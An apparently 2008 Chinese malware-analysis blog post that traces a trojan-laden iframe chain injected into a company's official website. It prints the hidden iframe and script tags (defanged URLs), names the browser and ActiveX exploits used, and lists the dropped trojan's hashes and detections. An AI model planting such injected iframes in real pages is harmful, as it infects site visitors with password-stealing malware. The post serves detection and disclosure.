某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg

某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg

endurer 原创
2008-02-29 第1版

1.网站首页包含代码：
/---
＜iframe src=hxxp://pop**.i**ms**e*e*.cc/g3.htm width=100 height=0＞＜/iframe＞
---/

1.1 hxxp://pop**.i**ms**e*e*.cc/g3.htm 包含代码：
/---
＜iframe src=news.html width=100 height=0＞＜/iframe＞
---/

1.1.1 hxxp://pop**.i**ms**e*e*.cc/news.html　输出代码：
/---
＜script src=hxxp://x**x*x.c**ka**bc*.net/ms06014.js＞＜/script＞
＜iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/GLWORLD.html"＞＜/iframe＞
＜iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/StormII.html"＞＜/iframe＞
＜sCrIpT LAnGuAgE="jAvAsCrIpT" src=hxxp://x**x*x.c**ka**bc*.net/real.js＞＜/script＞
＜iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/Thunder.html"＞＜/iframe＞
---/

1.1.1.1 hxxp://x**x*x.c**ka**bc*.net/ms06014.js

利用 MS06-014漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css
bak.css其实是一个PE格式的可执行文件

文件说明符 : D:/test/bak.css
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-29 12:15:9
修改时间 : 2008-2-29 12:15:9
访问时间 : 2008-2-29 12:15:49
大小 : 11504 字节 11.240 KB
MD5 : 17de1eca74664e197a5614762d072b19
SHA1: 56EC3173D9C98552628E3C24688F520B430AC610
CRC32: ee46ca17

Kaspersky 已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.sbg 文件: D:/test/bak.css/PE_Patch/UPack

瑞星报为：Trojan.Win32.Undef.dkp

1.1.1.2 hxxp://x**x*x.c**ka**bc*.net/GLWORLD.html

利用 联众世界的游戏大厅主程序GLWorld所安装的ActiveX控件（HanGamePluginCn18.dll，CLSID：61F5C358-60FB-4A23-A312-D2B556620F20）漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css

1.1.1.3 hxxp://x**x*x.c**ka**bc*.net/StormII.html

利用 暴风影音2 组件mps.dll（clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB）漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css

1.1.1.4 hxxp://x**x*x.c**ka**bc*.net/real.js

利用 RealPlayer 漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css

1.1.1.5 hxxp://x**x*x.c**ka**bc*.net/Thunder.html
内容空白

1.1.1.6 利用 BaiduBar.Tool 下载 hxxp://x**x*x.c**ka**bc*.net/Baidu.cab
Baidu.cab 中的 Baidu.exe 与 bak.css相同。